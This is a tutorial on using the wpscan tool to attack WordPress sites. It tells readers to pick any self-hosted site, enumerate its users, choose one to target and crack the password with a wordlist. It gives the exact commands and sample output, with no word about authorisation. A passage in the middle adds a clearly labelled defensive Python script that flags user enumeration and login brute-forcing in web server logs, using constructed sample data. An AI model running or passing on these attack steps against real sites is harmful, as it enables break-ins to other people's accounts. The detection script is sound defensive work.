This tutorial teaches you how to use wpscan. If you’re here then you already know what it is and I don’t need to go into detail about what it does! Let’s get started.

First of all you need to find a site that is running on WordPress. Now, there is something you need to understand before starting. There are two ways to host a WordPress site. The first is as a sub-domain of wordpress.com, so the user’s site address will be MySite.wordpress.com. This is no good. If you try to enumerate the users from this it won’t work, or you will get the following results:

[+] We found the following 5 user/s:
+----+-----------+------------------------------+
| Id | Login     | Name                         |
+----+-----------+------------------------------+
| 1  | admin     | 301 Moved                    |
| 2  | donncha   | Donncha                      |
| 5  | matt      | 301 Moved                    |
| 7  | 7         | Anthony                      |
| 9  | ian       | Ian McKellar                 |
+----+-----------+------------------------------+
As much as it looks like you might have just pulled all the usernames from your target site… you haven’t. What you’ve actually done is pull the usernames from wordpress.com itself, and I wouldn’t advise going any further targeting that domain. Unless you want to get a knock at the door by some people holding some handcuffs.

Anyway, the second way to host WordPress is on a stand-alone server, and those are the sites this tutorial applies to.

So the first thing you will want to do is make sure it’s a WordPress site.

Type the following:

ruby ./wpscan.rb --url www.DomainName.com

This will scan the site, and provided you don’t get an error, you’re in business.

Now the next thing you want to do is find out what the admin account username is. To do that type:

ruby ./wpscan.rb --url www.DomainName.com --enumerate u

This will give you a list of the registered users on your target site. Select a user you want to target and move onto the next step.

Now to start attacking the username of your choice, type the following (you will need a password list for this; you can try searching for one on the internet to get you started):

ruby ./wpscan.rb --url www.DomainName.com --wordlist passwords.lst --username Username

The software will get to work on cracking the user’s account and will let you know as soon as it has found the correct password. This could take some time, so let it run in the background and go back to check it periodically.
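The two steps above (walking the author IDs to enumerate users, then running a wordlist against wp-login.php) leave a recognisable trace in the web server’s access log. The following script is added here as an example of how a site owner can spot that trace; it is not part of the original tutorial or of wpscan itself. The log lines, IP addresses and thresholds are constructed, and the author-ID pattern assumes the /?author=N redirect technique that wpscan’s user enumeration relies on.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format; only the fields needed here are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
AUTHOR_RE = re.compile(r'^/\?author=(\d+)$')   # author-ID walk: /?author=1, 2, 3 ...

def parse(line):
    # One combined-format line -> dict, or None if it does not match the format.
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec

def detect(lines, author_min=3, login_min=5, window=timedelta(minutes=5)):
    """Return {ip: set(alerts)}: 'author-enumeration' when one IP requests >= author_min
    distinct author IDs, 'login-bruteforce' when it POSTs to wp-login.php >= login_min
    times inside any sliding window of length `window`."""
    author_ids, login_times = defaultdict(set), defaultdict(list)
    for rec in filter(None, map(parse, lines)):
        m = AUTHOR_RE.match(rec["path"])
        if m:
            author_ids[rec["ip"]].add(int(m.group(1)))
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            login_times[rec["ip"]].append(rec["ts"])
    alerts = defaultdict(set)
    for ip, ids in author_ids.items():
        if len(ids) >= author_min:
            alerts[ip].add("author-enumeration")
    for ip, times in login_times.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):        # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            if end - start + 1 >= login_min:
                alerts[ip].add("login-bruteforce")
                break
    return dict(alerts)

# Constructed sample traffic (not from a real server): one host walks four author
# IDs and fires six login POSTs within a minute; another host logs in once.
ATTACKER, NORMAL = "203.0.113.7", "198.51.100.4"
SAMPLE_LOG = [f'{ATTACKER} - - [10/Oct/2023:13:55:0{i} +0000] "GET /?author={i} HTTP/1.1" 301 0 "-" "Mozilla/5.0"'
              for i in range(1, 5)]
SAMPLE_LOG += [f'{ATTACKER} - - [10/Oct/2023:13:56:{10 + i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3500 "-" "Mozilla/5.0"'
               for i in range(6)]
SAMPLE_LOG.append(f'{NORMAL} - - [10/Oct/2023:13:57:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
```

Run detect(SAMPLE_LOG) to see only the enumerating host flagged with both alerts; tune author_min, login_min and window to the normal traffic of your own site before alerting on them.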

This tutorial covers only a fraction of what the software can do, so I suggest you type the following command to find out what else it can do:

ruby ./wpscan.rb --help

Good luck with this great tool. Please use it responsibly!